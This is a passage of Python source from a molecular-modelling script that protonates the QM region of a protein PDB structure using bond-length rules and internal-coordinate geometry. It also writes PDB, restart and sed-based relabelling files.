list_out\n\n\n\ndef write_restart_anam(f_qm,work_pdb):\n## write input to restart this programm\n r_anam=open(\"restart_anam\",\"w\")\n w_pdb=open(\"pdb_syst1\",\"w\")\n# w_label=open(\"label_vis.sh\",\"w\")\n atm_nr=0\n for i in range(len(f_qm)):\n for j in range(len(work_pdb)):\n if f_qm[i]==work_pdb[j][1]:\n# print(work_pdb[j])\n string=\"ANAM \"+ work_pdb[j][2]+\" \"+str(work_pdb[j][6])+\" \" + work_pdb[j][5] + \"\\n\"\n s_pdb, atm_nr= write_pdbi_line(work_pdb[j], atm_nr)\n# s_label=prep_vis(work_pdb[j])\n r_anam.write(string)\n w_pdb.write(s_pdb)\n# w_label.write(s_label)\n\ndef write_rename(f_all,f_trunc,work_pdb):\n w_label=open(\"label_vis.sh\",\"w\")\n for i in range(len(f_all)):\n for j in range(len(work_pdb)):\n if f_all[i]==work_pdb[j][1]:\n ele=work_pdb[j][14]\n if f_all[i] in f_trunc:\n ele=\"H\"\n\n s_label=prep_vis(work_pdb[j],ele)\n w_label.write(s_label)\n\ndef prep_vis(pdb,ele):\n#preper bash file for the corect labeling of the pdb file from mimic\n#[0, 1 , 2 , 3 , 4 , 5 , 6, , 7 , 8, 9,10\n#[a, a_num, a_name, alter, res_name, chain, res_num, inser, x, y, z\n#11 , 12 , 13 , 14 , 15\n#occ, b_fac, seg_i, ele, charge]\n\n res_nam= pdb[4]\n res_num= pdb[6]\n chain= pdb[5]\n string=\"sed -i \\\"0,/\"\n string = string + str('{:2}'.format(ele))\n# string = string + \" ??? 1/s//\"\n string = string + \" ??? 1/s/\"\n string = string + str('{:2}'.format(ele))\n string = string + \" ??? 1/\"\n\n\n string = string + str('{:2}'.format(ele))\n string = string + \" \"\n string = string + str(res_nam) + \" \"\n string = string + str(chain)#+ \" \"\n string = string + str('{:4}'.format(res_num))\n string = string + \"/g\\\" pdb\"\n string = string + \"\\n\"\n return string\n\ndef write_pdbi_line(pdb, atm_nr):\n## wite out PDB file\n atm_nr = atm_nr + 1\n string = str('{:6}'.format(pdb[0]))\n string = string + str('{:5.0f}'.format(atm_nr))\n string = string + \" \"\n string = string + str('{:3s}'.format(str(pdb[2])))\n string = string + str('{:1}'.format(pdb[3]))\n string = string + str('{:3}'.format(pdb[4]))\n string = string + str('{:>2}'.format(pdb[5]))\n string = string + str('{:4}'.format(pdb[6]))\n string = string + str('{:1}'.format(pdb[7]))\n string = string + \" \"\n string = string + str('{:8.3f}'.format(pdb[8]))\n string = string + str('{:8.3f}'.format(pdb[9]))\n string = string + str('{:8.3f}'.format(pdb[10]))\n string = string + str('{:6.2f}'.format(pdb[11]))\n string = string + str('{:6.2f}'.format(pdb[12]))\n string = string + str('{:>7}'.format(pdb[13]))\n string = string + str('{:>5}'.format(pdb[14]))\n\n\n string = string + \"\\n\"\n return string, atm_nr\n\n\ndef atm_to_res(pdb_read):\n# sort pdb in residues\n pdb=[]\n pdb.append([pdb_read[0]])\n for i in range(1,len(pdb_read)):\n if pdb_read[i][6] != pdb_read[i-1][6]:\n# print(len(pdb))\n pdb.append([pdb_read[i]])\n if pdb_read[i][6] == pdb_read[i-1][6]:\n pdb[len(pdb)-1].append(pdb_read[i])\n\n return pdb\n\ndef proto_qm(pdb,atom_qm,f_p):\n# protonates qm system if protons are not existing\n# print(\"protonate syst1\")\n if f_p== False:\n return pdb\n print(\"protonate syst1\")\n for i in range(len(atom_qm)):\n# print(\"protonate syst1\")\n\n# print(atom_qm[i])\n xyz=[atom_qm[i][8],atom_qm[i][9],atom_qm[i][10]]\n# print(xyz)\n ele=atom_qm[i][14]\n# print(ele)\n# print(atom_qm[i])\n if ele==\"C\":\n pdb=prot_c(pdb,xyz,ele,atom_qm[i])\n if ele==\"N\":\n pdb=prot_n(pdb,xyz,ele,atom_qm[i])\n if ele==\"O\":\n pdb=prot_o(pdb,xyz,ele,atom_qm[i])\n return pdb\n\ndef prot_n(pdb,xyz,ele,atom_qm):\n## identyfy atom pype and protanes it\n bond_atom=f_bond_atoms(pdb,atom_qm)\n n_bonds=def_n_bonds(xyz,ele,bond_atom)\n if 1.5< n_bonds <= 2.5 and len(bond_atom)==2:\n pdb= ad_NH_s(pdb,bond_atom[0],bond_atom[1],atom_qm)\n return pdb\n if n_bonds==1 and len(bond_atom)==1:\n pdb=ad_NH2(pdb,bond_atom[0],atom_qm)\n return pdb\n return pdb\n\n\ndef ad_NH2(pdb, A2, A3):\n# ad 2H as NH2 group to A3\n# print(\"¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤\")\n r = 1.012\n Ad = 120\n Dd = 180\n Dd1 = 0\n A1=find_A1(pdb,A3,A2) \n A3xyz = [A3[8],A3[9],A3[10]]\n A2xyz = [A2[8],A2[9],A2[10]]\n A1xyz = [A1[8],A1[9],A1[10]]\n\n adH1 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,Dd)\n adH2 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,Dd1)\n nam=list(A3[2])\n name = str(nam[0])\n\n name1 = \"H1\"+name\n name2 = \"H2\"+name\n pdb = add_to_pdb(pdb, A3, adH1, name1)\n pdb = add_to_pdb(pdb, A3, adH2, name2)\n\n return pdb\n\n\n\n\n\n\n\ndef ad_NH_s(pdb, A1, A2, A3):\n# ad H as NH (SP2) group to A3\n# print(\"atoms treatet\")\n# print(\"A3\",A3)\n# print(\"A2\",A2)\n# print(\"A1\",A1)\n r = 1.032\n Ad = 120\n Dd = 180\n A3xyz = [A3[8],A3[9],A3[10]]\n A2xyz = [A2[8],A2[9],A2[10]]\n A1xyz = [A1[8],A1[9],A1[10]]\n adH1 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,Dd)\n nam=list(A3[2])\n if len(nam)<=2:\n name=nam[0]\n else:\n name = nam[1]+nam[2]\n\n name1 = \"H\"+name\n\n# print(\"name1\",name1)\n# print(adH1)\n# print(A3)\n# print(\"next step ad to pdb\")\n pdb = add_to_pdb(pdb, A3, adH1, name1)\n# print(\"addet to pdb\")\n# print(\"&&&&&&&&&&&&&&&TEST&&&&&&&&&&&&\")\n return pdb\n\n\ndef prot_o(pdb,xyz,ele,atom_qm):\n## identyfy atom pype and protanes it\n bond_atom=f_bond_atoms(pdb,atom_qm)\n n_bonds=def_n_bonds(xyz,ele,bond_atom)\n# print(\"atom_qm\",n_bonds,len(bond_atom), atom_qm)\n# if atom_qm[4]==\"HOH\":\n# print(bond_atom)\n if n_bonds >= 2:\n return pdb\n if n_bonds==1 and len(bond_atom)==1:\n pdb=ad_OH(pdb,bond_atom[0],atom_qm)\n if n_bonds==0 and atom_qm[4]==\"HOH\":\n pdb = ad_OH_water(pdb,atom_qm)\n return pdb\n\n\ndef ad_OH_water(pdb,atom_qm):\n## protonates water in direction of posible hydrogen bonds\n print(atom_qm)\n l_vdw=vdw()\n l_h_bonds=find_h_bond(atom_qm,pdb,l_vdw)\n# for i in range(len(l_h_bonds)):\n# print(\"l_h_bonds\",l_h_bonds[i])\n if len(l_h_bonds)>=1:\n# print(\"######################adH1#######################\")\n adH1=find_short_H(atom_qm,l_h_bonds)\n if adH1[0]==0:\n return pdb\n name1 =\"H1\"+atom_qm[2]\n pdb = add_to_pdb(pdb, atom_qm, adH1, name1)\n if len(l_h_bonds)>=2: \n# print(\"______________________________adH2_______________________\")\n adH2=find_short_H(atom_qm,l_h_bonds)\n if adH2[0]==0:\n return pdb\n name2 =\"H2\"+atom_qm[2]\n pdb = add_to_pdb(pdb, atom_qm, adH2, name2)\n\n return pdb\n\n\ndef find_short_H(atom_qm,l_h_bonds):\n## finds shortest istace in list of coordinates\n P1=[atom_qm[8],atom_qm[9],atom_qm[10]]\n d_min=1000000\n for i in range(len(l_h_bonds)):\n P2=[l_h_bonds[i][8],l_h_bonds[i][9],l_h_bonds[i][10]]\n dist=CDist2(P1,P2)\n if dist< d_min:\n exist=f_ex_h(pdb, P1, P2)\n# print(\"exist\",exist)\n# if exist == True:\n# print(\"l_h_bonds[i]\",l_h_bonds[i])\n if exist == False:\n d_min=dist\n atom_min=l_h_bonds[i]\n\n P_s=[atom_min[8],atom_min[9],atom_min[10]]\n vec=twoP_to_vec(P1,P_s)\n# print(\"len3Dvec(vec)\",len3dvec(vec))\n h_vec=resize_vec(vec,0.98)\n# print(\"len3Dvec(h_vec)\",len3dvec(h_vec))\n \n coord=[P1[0]+h_vec[0],P1[1]+h_vec[1],P1[2]+h_vec[2]]\n if coord == P1:\n coord= [0]\n return coord\n\ndef f_ex_h(pdb, A1, A2):\n#check if hydrogen is positiond in 30 deree to OHO distance\n## false if proton not existing true if existing\n flag=False\n dh=1.5\n max_dist=0.6\n for j in range(len(pdb)):\n for k in range(len(pdb[j])): \n if pdb[j][k][14]==\"H\" or pdb[j][k][14]==\"D\" :\n p0=[pdb[j][k][8],pdb[j][k][9],pdb[j][k][10]]\n d1= CDist2(A1,p0)\n d2=CDist2(A2,p0)\n ang=CAngle(A1,p0,A2)\n if d1 <= dh or d2 <=dh:\n if 120 <= ang <= 220:\n# print(\"ATOM H\",pdb[j][k])\n# print(\"ang\",ang)\n flag=True\n\n\n return flag\n\n\ndef d_p_to_line(p0,p1,p2):\n## calculate distance between a point0 and a line between p1 and p2\n if (p1[0] == p2[0] and p1[1] == p2[1] and p1[2] == p2[2]):\n d=0\n else:\n if (p2[0]-p1[0] != 0):\n t=-((p1[0]-p0[0])*(p2[0]-p1[0]))/((abs(p2[0]-p1[0]))**2)\n elif (p2[1]-p1[2] != 0 ):\n t=-((p1[1]-p0[1])*(p2[1]-p1[1]))/((abs(p2[1]-p1[1]))**2)\n elif ( p2[2]-p1[2] != 0):\n t=-((p1[2]-p0[2])*(p2[2]-p1[2]))/((abs(p2[2]-p1[2]))**2)\n\n d2=((p1[0]-p0[0])+(p2[0]-p1[0])*t)**2+((p1[1]-p0[1])+(p2[1]-p1[1])*t)**2+((p1[2]-p0[2])+(p2[2]-p1[2])*t)**2\n d=d2**(0.5)\n return d\n\n\n\n\ndef resize_vec(vec,r):\n vec=Normlz(vec)\n# print(\"len3Dvec(vec)\",len3dvec(vec))\n\n new_vec=[vec[0]*r,vec[1]*r,vec[2]*r]\n\n return new_vec\n\ndef find_h_bond(atom_qm,pdb,l_vdw):\n OO=l_vdw[3][1]+l_vdw[3][1]\n ON=l_vdw[3][1]+l_vdw[4][1]\n\n h_bond=[]\n O=[atom_qm[8],atom_qm[9],atom_qm[10]]\n for j in range(len(pdb)):\n for k in range(len(pdb[j])):\n if pdb[j][k][14]==\"O\" or pdb[j][k][14]==\"N\" :\n# print(pdb[k][6],l_water[i][j][6])\n if pdb[j][k][6]!=atom_qm[6]:\n acc=[pdb[j][k][8],pdb[j][k][9],pdb[j][k][10]]\n dist=CDist2(O,acc)\n if pdb[j][k][14]==\"O\":\n if dist <= OO:\n h_bond.append(pdb[j][k])\n if pdb[j][k][14]==\"N\":\n if dist <= ON:\n h_bond.append(pdb[j][k])\n\n return h_bond\n\n\ndef vdw():\n l_vdw=[[\"H\",1.20],[\"D\",1.20],[\"C\",1.70],[\"O\",1.52],[\"N\",1.55],[\"CL\",1.75],[\"F\",1.47],[\"BR\",1.85]]\n# h_vdw=1.20\n# c_vdw=1.70\n# o_vdw=1.52\n# n_vdw=1.55\n# s_vdw=1.80\n# cl_vdw= 1.75\n# f_vdw=1.47\n# br_vdw= 1.85\n return l_vdw\n\n\ndef ad_OH(pdb, A2, A3):\n# ad H as OH group to A3\n r = 0.978\n Ad = 106\n Dd = 180\n A1=find_A1(pdb,A3,A2)\n A3xyz = [A3[8],A3[9],A3[10]]\n A2xyz = [A2[8],A2[9],A2[10]]\n A1xyz = [A1[8],A1[9],A1[10]]\n\n adH1 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,Dd)\n name1 =\"H\"+A3[2]\n pdb = add_to_pdb(pdb, A3, adH1, name1)\n\n return pdb\n\n\n\ndef prot_c(pdb,xyz,ele,atom_qm):\n## identyfy atom pype and protanes it\n bond_atom=f_bond_atoms(pdb,atom_qm)\n\n# print(bond_atom)\n# print(\"xyz###\",xyz)\n n_bonds=def_n_bonds(xyz,ele,bond_atom)\n res_num=atom_qm[6]\n alter=atom_qm[3]\n if n_bonds >= 4:\n return pdb\n if n_bonds==1:\n pdb = ad_CH3(pdb,res_num,alter,bond_atom[0],atom_qm)\n \n if n_bonds<=2.5 and len(bond_atom)==2:\n pdb = ad_CH2(pdb, res_num, alter, bond_atom[0], bond_atom[1], atom_qm) \n if 2.5< n_bonds<= 3.5 and len(bond_atom)==2:\n pdb = ad_CH_ar(pdb, bond_atom[0], bond_atom[1], atom_qm)\n if 2.5< n_bonds<= 3.5 and len(bond_atom)==3:\n pdb = ad_CH_R3(pdb, bond_atom[0], bond_atom[1], atom_qm, bond_atom[2])\n\n# print(\"n_bonds\",ele,n_bonds)\n \n return pdb\n\ndef ad_CH_R3(pdb, A1, A2, A3, A4):\n r = 1.032\n Ad = 109\n Dd = 116\n A3xyz = [A3[8],A3[9],A3[10]]\n A2xyz = [A2[8],A2[9],A2[10]]\n A1xyz = [A1[8],A1[9],A1[10]]\n A4xyz = [A4[8],A4[9],A4[10]]\n\n adH1 = H_tert(A1xyz, A2xyz, A3xyz, A4xyz,r)\n name1 =\"H\"+A3[2]\n pdb = add_to_pdb(pdb, A3, adH1, name1)\n\n return pdb\n\ndef H_tert(A1, A2, A3, A4,r):\n## set terzier H to A3 in dinstace r\n v1=twoP_to_vec(A3,A1)\n v2=twoP_to_vec(A3,A2)\n v3=twoP_to_vec(A3,A4)\n v_sum=[0,0,0]\n for i in range(len(v_sum)):\n v_sum[i]=-(v1[i]+v2[i]+v3[i])\n\n len_v_sum=len3dvec(v_sum)\n H_vec=[0,0,0]\n for i in range(len(v_sum)):\n H_vec[i]=(r*v_sum[i])/len_v_sum\n H_pos=[0,0,0]\n for i in range(len(H_vec)):\n H_pos[i]=A3[i]+H_vec[i]\n return H_pos\n\n\n\n\ndef ad_CH_ar(pdb, A1, A2, A3):\n# ad H as CH (SP2) group to A3\n r = 1.014\n Ad = 120\n Dd = 180\n A3xyz = [A3[8],A3[9],A3[10]]\n A2xyz = [A2[8],A2[9],A2[10]]\n A1xyz = [A1[8],A1[9],A1[10]]\n adH1 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,Dd)\n name1 =\"H\"+A3[2]\n nam=list(A3[2])\n if len(nam)<=2:\n name=nam[1]\n else:\n name = nam[1]+nam[2]\n\n name1 = \"H\"+name\n pdb = add_to_pdb(pdb, A3, adH1, name1)\n\n return pdb\n\n\n\n\n\n\n\n\n\ndef ad_CH2(pdb, res_num, alter, A1, A2, A3):\n# ad 2H as CH2 group to A3\n\n r = 1.095\n Ad = 109\n Dd= -121.5\n A3xyz = [A3[8],A3[9],A3[10]]\n A2xyz = [A2[8],A2[9],A2[10]]\n A1xyz = [A1[8],A1[9],A1[10]]\n\n adH1 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,Dd)\n adH2 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,-Dd)\n nam=list(A3[2])\n if len(nam)<=2:\n name=nam[1]\n else:\n name = nam[1]+nam[2]\n\n name1 = \"1H\"+name\n name2 = \"2H\"+name\n pdb = add_to_pdb(pdb, A3, adH1, name1)\n\n pdb = add_to_pdb(pdb, A3, adH2, name2)\n return pdb\n\ndef ad_CH3(pdb, res_num,alter, A2, A3):\n# ad 3H as CH3 group to A3\n# for alt in range(len(alter)):\n# print(\"alter[alt]\",alter[alt])\n# com = check(pdb,res_num,alter[alt],A1, A2, A3, 1)\n# print(com)\n# if com == False:\n# return pdb\n# print( pdb[res_num])\n# print(\"A2\", A2)\n A1=find_A1(pdb,A3,A2)\n# print(\"A1\",A1)\n r = 1.095\n Ad = 109\n Dd = 180\n Dd1 = 60\n A3xyz = [A3[8],A3[9],A3[10]]\n A2xyz = [A2[8],A2[9],A2[10]]\n A1xyz = [A1[8],A1[9],A1[10]]\n adH1 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,Dd)\n adH2 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,Dd1)\n adH3 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,-Dd1)\n nam=list(A3[2])\n if len(nam)<=2:\n name=nam[0]\n else:\n name = nam[0]+nam[1]\n\n name1 = \"H1\"+name\n name2 = \"H2\"+name\n name3 = \"H3\"+name\n pdb = add_to_pdb(pdb, A3, adH1, name1)\n pdb = add_to_pdb(pdb, A3, adH2, name2)\n pdb = add_to_pdb(pdb, A3, adH3, name3)\n return pdb\n\ndef add_to_pdb(pdb,old_atm,new_koord,new_nam):\n## ad a new deuterium atom to behind an existing atom in the pdb list\n atom=0\n new_nam=\"H\"\n for i in range(len(pdb)):\n for k in range(len(pdb[i])): \n# print(\"ALT\",alt)\n# atom=0\n# print(pdb[res_num][i][3])\n# print(pdb[res_num][i][2].strip())\n if pdb[i][k][2].strip()==old_atm[2].strip() and\\\n pdb[i][k][3].strip()==old_atm[3].strip() and\\\n pdb[i][k][5].strip()==old_atm[5].strip() and\\\n pdb[i][k][6]==old_atm[6]:\n atom=pdb[i][k]\n indice = k+1\n res_num=i\n\n if atom == 0:\n return pdb\n l_pdb=[]\n l_pdb.append(atom[0])\n l_pdb.append(atom[1])\n l_pdb.append(new_nam)\n l_pdb.append(atom[3])\n l_pdb.append(atom[4])\n l_pdb.append(atom[5])\n l_pdb.append(atom[6])\n l_pdb.append(atom[7])\n l_pdb.append(new_koord[0])\n l_pdb.append(new_koord[1])\n l_pdb.append(new_koord[2])\n l_pdb.append(atom[11])\n l_pdb.append(atom[12])\n l_pdb.append(atom[13])\n l_pdb.append(\"H\")\n l_pdb.append(\" \")\n# print(\"old_atom\",old_atm)\n# print(\"atom\",atom)\n# print(\"l_pdb\",l_pdb)\n# print(\"???????????????????????????????????????????\")\n pdb[res_num].insert(indice, l_pdb)\n# pdb[res_num].append(l_pdb)\n return pdb\n\n\n\ndef find_A1(pdb,A3,A2):\n# find atom bond to A2 to define dihedral to A3\n# print(\"A3\",A3)\n# print(\"A2\",A2)\n bond_atoms=f_bond_atoms(pdb,A2)\n# print(bond_atoms)\n for i in range(len(bond_atoms)):\n if bond_atoms[i][2]!= A3[2]:\n A1=bond_atoms[i]\n\n\n return A1\n\ndef CAngle(x,y,z):\n# calculate angle between a,b,c in degree\n x1=[0,0,0]\n x2=[0,0,0]\n for i in range(len(x)):\n x1[i]=y[i]-x[i]\n x2[i]=y[i]-z[i]\n Cangle=C2Angle(x1,x2)\n return Cangle\ndef C2Angle(x,y):\n#Calculates the angle between x and y\n#Answer in degrees\n #Calculate the angle between x and y\n rtodeg = 57.2957795\n C2angle=(ScalPr(x,y)/(len3dvec(x)*len3dvec(y)))\n# print(\"C2angle=\",C2angle)\n if 0.999999999 <= C2angle <= 1.000000000001 :\n C2angle=0\n elif -0.999999999 >= C2angle >= -1.000000000001:\n C2angle=180\n else:\n C2angle=np.arccos(C2angle)*rtodeg\n return C2angle\ndef ScalPr(x,y):\n#calculate the scalar product\n pro= x[0]*y[0]+x[1]*y[1]+x[2]*y[2]\n return pro\n\n\ndef Cross(x1,x2):\n#Calculates the cross product x3 = x1 x x2\n x3 = [0,0,0]\n x3[0]=x1[1]*x2[2]-x2[1]*x1[2]\n x3[1]=x1[2]*x2[0]-x2[2]*x1[0]\n x3[2]=x1[0]*x2[1]-x2[0]*x1[1]\n return x3\n\ndef Normlz(xyz):\n# Normalise xyz \n temp = 1/len3dvec(xyz)\n for i in range(len(xyz)):\n xyz[i]=xyz[i]*temp\n\n return xyz\ndef ZeroVector():\n## creates ZeroVector\n zerov = np.array([0,0,0])\n return zerov\n\ndef CDihed(x,y,z,w):\n#Calculate the dihedral angle x-y-z-w\n#Answer in degrees between -180 and +180\n #Set v1=y-x, v2=z-y, v3=w-z\n v1=[0,0,0]\n v2=[0,0,0]\n v3=[0,0,0]\n for i in range(3):\n v1[i]=y[i]-x[i]\n v2[i]=z[i]-y[i]\n v3[i]=w[i]-z[i]\n\n #Calculate the normal vectors n1 and n2\n n1=Cross(v1,v2)\n n2=Cross(v2,v3)\n\n #Calculate the torsion angle;\n #The sign is determined by the sign of v1.n2\n CDihed=C2Angle(n1,n2)\n if ScalPr(v1,n2) < 0:\n CDihed=-CDihed\n return CDihed\n\n\ndef ZtoXYZ(axyz,bxyz,cxyz,R,Ad,Dd):\n#defines coordinates of 4th atom fro coordinates of 3 atoms distance\n#angel and dihedral \n dxyz = [0,0,0]\n rtodeg = 57.2957795\n\n ## first check if atoms are linear (of yes something is wrong)\n tangle=CAngle(axyz,bxyz,cxyz)\n if abs(tangle)<= 0.1 or 179.9<= abs(tangle) <= 180.0:\n print(\"The atoms are collinear\", tangle)\n sys.exit()\n\n # transforme vrom degree to rad\n A = Ad/rtodeg\n D = Dd/rtodeg\n\n ## Calculate the coordinates in a simple coordinate system\n dxyz[0] = (-R)* np.sin(A)*np.sin(D)\n dxyz[1] = R * np.cos(A)\n dxyz[2] = R * np.sin(A)*np.cos(D)\n b = np.sqrt(CDist2(bxyz,cxyz))\n ab1 = np.sqrt(CDist2(axyz,bxyz))\n ang = CAngle(axyz,bxyz,cxyz)/rtodeg\n a2 = b - np.cos(ang)*ab1\n a3 = np.sin(ang)*ab1\n a1 = 0.0000\n\n ## Now, atom D is transformed into the original coordinate system\n ## 1st rotation\n tv = np.array([0.00, b, 0.00])\n bcv = np.array([bxyz[0]-cxyz[0], bxyz[1]-cxyz[1],bxyz[2]-cxyz[2]])\n rv = Cross(tv, bcv)\n rv = Normlz(rv)\n rv = np.array([rv[0],rv[1],rv[2]])\n zerov = ZeroVector()\n phi = CAngle(tv,zerov,bcv)/rtodeg\n an = [0,0,0]\n an[0]=(rv[0]*rv[0]+(1-rv[0])*(1+rv[0])*np.cos(phi))*a1+\\\n (rv[0]*rv[1]*(1-np.cos(phi))-rv[2] *np.sin(phi))*a2+\\\n (rv[0]*rv[2]*(1-np.cos(phi))+rv[1] *np.sin(phi))*a3\n\n an[1]=(rv[0]*rv[1]*(1-np.cos(phi))+rv[2] *np.sin(phi))*a1+\\\n (rv[1]*rv[1]+(1-rv[1])*(1+rv[1])*np.cos(phi))*a2+\\\n (rv[1]*rv[2]*(1-np.cos(phi))-rv[0] *np.sin(phi))*a3\n\n an[2]=(rv[0]*rv[2]*(1-np.cos(phi))-rv[1] *np.sin(phi))*a1+\\\n (rv[1]*rv[2]*(1-np.cos(phi))+rv[0] *np.sin(phi))*a2+\\\n (rv[2]*rv[2]+(1-rv[2])*(1+rv[2])*np.cos(phi))*a3\n\n dn = [0,0,0]\n dn[0]=(rv[0]*rv[0]+(1-rv[0])*(1+rv[0])*np.cos(phi))*dxyz[0]+ \\\n (rv[0]*rv[1]*(1-np.cos(phi))-rv[2] *np.sin(phi))*dxyz[1]+\\\n (rv[0]*rv[2]*(1-np.cos(phi))+rv[1] *np.sin(phi))*dxyz[2]\n\n dn[1]=(rv[0]*rv[1]*(1-np.cos(phi))+rv[2] *np.sin(phi))*dxyz[0]+\\\n (rv[1]*rv[1]+(1-rv[1])*(1+rv[1])*np.cos(phi))*dxyz[1]+ \\\n (rv[1]*rv[2]*(1-np.cos(phi))-rv[0] *np.sin(phi))*dxyz[2]\n\n dn[2]=(rv[0]*rv[2]*(1-np.cos(phi))-rv[1] *np.sin(phi))*dxyz[0]+\\\n (rv[1]*rv[2]*(1-np.cos(phi))+rv[0] *np.sin(phi))*dxyz[1]+\\\n (rv[2]*rv[2]+(1-rv[2])*(1+rv[2])*np.cos(phi))*dxyz[2]\n\n dxyz = [dn[0], dn[1],dn[2]]\n\n\n # 2nd rotation\n tv[0]=axyz[0]-cxyz[0]\n tv[1]=axyz[1]-cxyz[1]\n tv[2]=axyz[2]-cxyz[2]\n phi=CDihed(tv,bcv,zerov,an)/rtodeg\n bcv = Normlz(bcv)\n\n dn[0]=(bcv[0]*bcv[0]+(1-bcv[0])*(1+bcv[0])*np.cos(phi))*dxyz[0]+\\\n (bcv[0]*bcv[1]*(1-np.cos(phi))-bcv[2]*np.sin(phi)) *dxyz[1]+\\\n (bcv[0]*bcv[2]*(1-np.cos(phi))+bcv[1]*np.sin(phi)) *dxyz[2]\n\n dn[1]=(bcv[0]*bcv[1]*(1-np.cos(phi))+bcv[2]*np.sin(phi)) *dxyz[0]+\\\n (bcv[1]*bcv[1]+(1-bcv[1])*(1+bcv[1])*np.cos(phi))*dxyz[1]+\\\n (bcv[1]*bcv[2]*(1-np.cos(phi))-bcv[0]*np.sin(phi)) *dxyz[2]\n\n dn[2]=(bcv[0]*bcv[2]*(1-np.cos(phi))-bcv[1]*np.sin(phi)) *dxyz[0]+\\\n (bcv[1]*bcv[2]*(1-np.cos(phi))+bcv[0]*np.sin(phi)) *dxyz[1]+\\\n (bcv[2]*bcv[2]+(1-bcv[2])*(1+bcv[2])*np.cos(phi))*dxyz[2]\n\n dxyz = [dn[0], dn[1],dn[2]]\n\n #Final translation\n dxyz[0]=dxyz[0]+cxyz[0]\n dxyz[1]=dxyz[1]+cxyz[1]\n dxyz[2]=dxyz[2]+cxyz[2]\n\n\n return dxyz\n\n\n\n\n\n\ndef f_bond_atoms(pdb,atom_qm):\n## find bondet atoms\n bond_atom=[]\n xyz=[atom_qm[8],atom_qm[9],atom_qm[10]]\n bond_atom=[]\n# print(\"xyz&&&\",xyz)\n for i in range(len(pdb)):\n for k in range(len(pdb[i])):\n p2=[pdb[i][k][8],pdb[i][k][9],pdb[i][k][10]]\n dist=CDist2(xyz,p2)\n # print(dist)\n if 0.5< dist< 2:\n# print(dist)\n bond_atom.append(pdb[i][k])\n return bond_atom\n\n\n\ndef def_n_bonds(xyz,ele,bond_atoms):\n# defines how many atoms are bond to the central atom with bond order\n nr_bonds=0\n# print(\"xyz!!!\",xyz)\n for i in range(len(bond_atoms)):\n p2=[bond_atoms[i][8],bond_atoms[i][9],bond_atoms[i][10]]\n dist=CDist2(xyz,p2)\n l_ele=[ele,bond_atoms[i][14]]\n# print(\"dist\",dist)\n if l_ele[0]==\"C\":\n if l_ele[1]==\"C\":\n if 0.5 < dist < 1.25:\n nr_bonds=nr_bonds+3\n if 1.25<= dist <=1.37:\n nr_bonds=nr_bonds+2\n if 1.38<= dist<= 1.47:\n nr_bonds=nr_bonds+1.5\n if 1.48<= dist:\n nr_bonds=nr_bonds+1\n elif l_ele[1]==\"O\":\n if 0.5<= dist <=1.32:\n nr_bonds=nr_bonds+2\n if 1.33<= dist:\n nr_bonds=nr_bonds+1\n elif l_ele[1]==\"N\":\n if 0.5<= dist <=1.39:\n nr_bonds=nr_bonds+1.5\n if 1.4<= dist:\n nr_bonds=nr_bonds+1\n elif l_ele[1]==\"H\":\n if 0.5<= dist <=1.39:\n nr_bonds=nr_bonds+1\n else:\n if 0.5<= dist <=2.5:\n nr_bonds=nr_bonds+1\n\n elif l_ele[0]==\"N\":\n if l_ele[1]==\"C\":\n if 0.5<= dist <=1.39:\n nr_bonds=nr_bonds+1\n elif 1.4<= dist:\n nr_bonds=nr_bonds+1\n elif l_ele[1]==\"H\":\n if 0.5<= dist <=1.39:\n nr_bonds=nr_bonds+1\n else:\n if 0.5<= dist <=2.5:\n nr_bonds=nr_bonds+1\n\n elif l_ele[0]==\"O\":\n if l_ele[1]==\"C\":\n if 0.5<= dist <=1.32:\n nr_bonds=nr_bonds+2\n elif 1.32 < dist:\n nr_bonds=nr_bonds+1\n elif l_ele[1]==\"H\":\n if 0.5<= dist <=1.29:\n nr_bonds=nr_bonds+1\n else:\n if 1.55< dist <=2.5:\n nr_bonds=nr_bonds+1\n if 0.5<= dist <= 1.55:\n nr_bonds=nr_bonds+2\n\n return nr_bonds\n\n\n\ndef CDist2(A,B):\n#calculate distance betweenn two points\n dist = len3dvec(twoP_to_vec(A, B))\n return dist\n\n\n\ndef len3dvec(vec):\n## calculates lengh of a 3D vecor\n## input as list\n a = np.sqrt(vec[0]**2 + vec[1]**2 + vec[2]**2)\n return a\n\ndef twoP_to_vec(A,B):\n#creates vector between two points\n vec = np.array([B[0]-A[0], B[1]-A[1], B[2]-A[2]])\n\n return vec\n\n\ndef renumber_pdb(pdb):\n#renumbers pdb\n num=0\n for i in range(len(pdb)):\n for j in range(len(pdb[i])):\n num=num+1\n pdb[i][j][1]=num\n\n return pdb\n\n\n\ndef write_pdb(pdb,head, output):\n## wite out PDB file\n# res = open(output, \"w\")\n res= open(\"comqum.pdb\",\"w\")\n atm_nr=0\n for i in range(len(head)):\n res.write(head[i])\n# res.write(\"\\n\")\n for i in range(len(pdb)):\n for k in range(len(pdb[i])):\n atm_nr = atm_nr + 1\n string = str('{:6}'.format(pdb[i][k][0]))\n string = string + str('{:5.0f}'.format(atm_nr))\n string = string + \" \"\n string = string + str('{:3s}'.format(str(pdb[i][k][2])))\n string = string + str('{:1}'.format(pdb[i][k][3]))\n string = string + str('{:3}'.format(pdb[i][k][4]))\n string = string + str('{:>2}'.format(pdb[i][k][5]))\n string = string + str('{:4}'.format(pdb[i][k][6]))\n string = string + str('{:1}'.format(pdb[i][k][7]))\n string = string + \" \"\n string = string + str('{:8.3f}'.format(pdb[i][k][8]))\n string = string + str('{:8.3f}'.format(pdb[i][k][9]))\n string = string + str('{:8.3f}'.format(pdb[i][k][10]))\n string = string + str('{:6.2f}'.format(pdb[i][k][11]))\n string = string + str('{:6.2f}'.format(pdb[i][k][12]))\n string = string + str('{:>7}'.format(pdb[i][k][13]))\n string = string + str('{:>5}'.format(pdb[i][k][14]))\n\n\n string = string + \"\\n\"\n 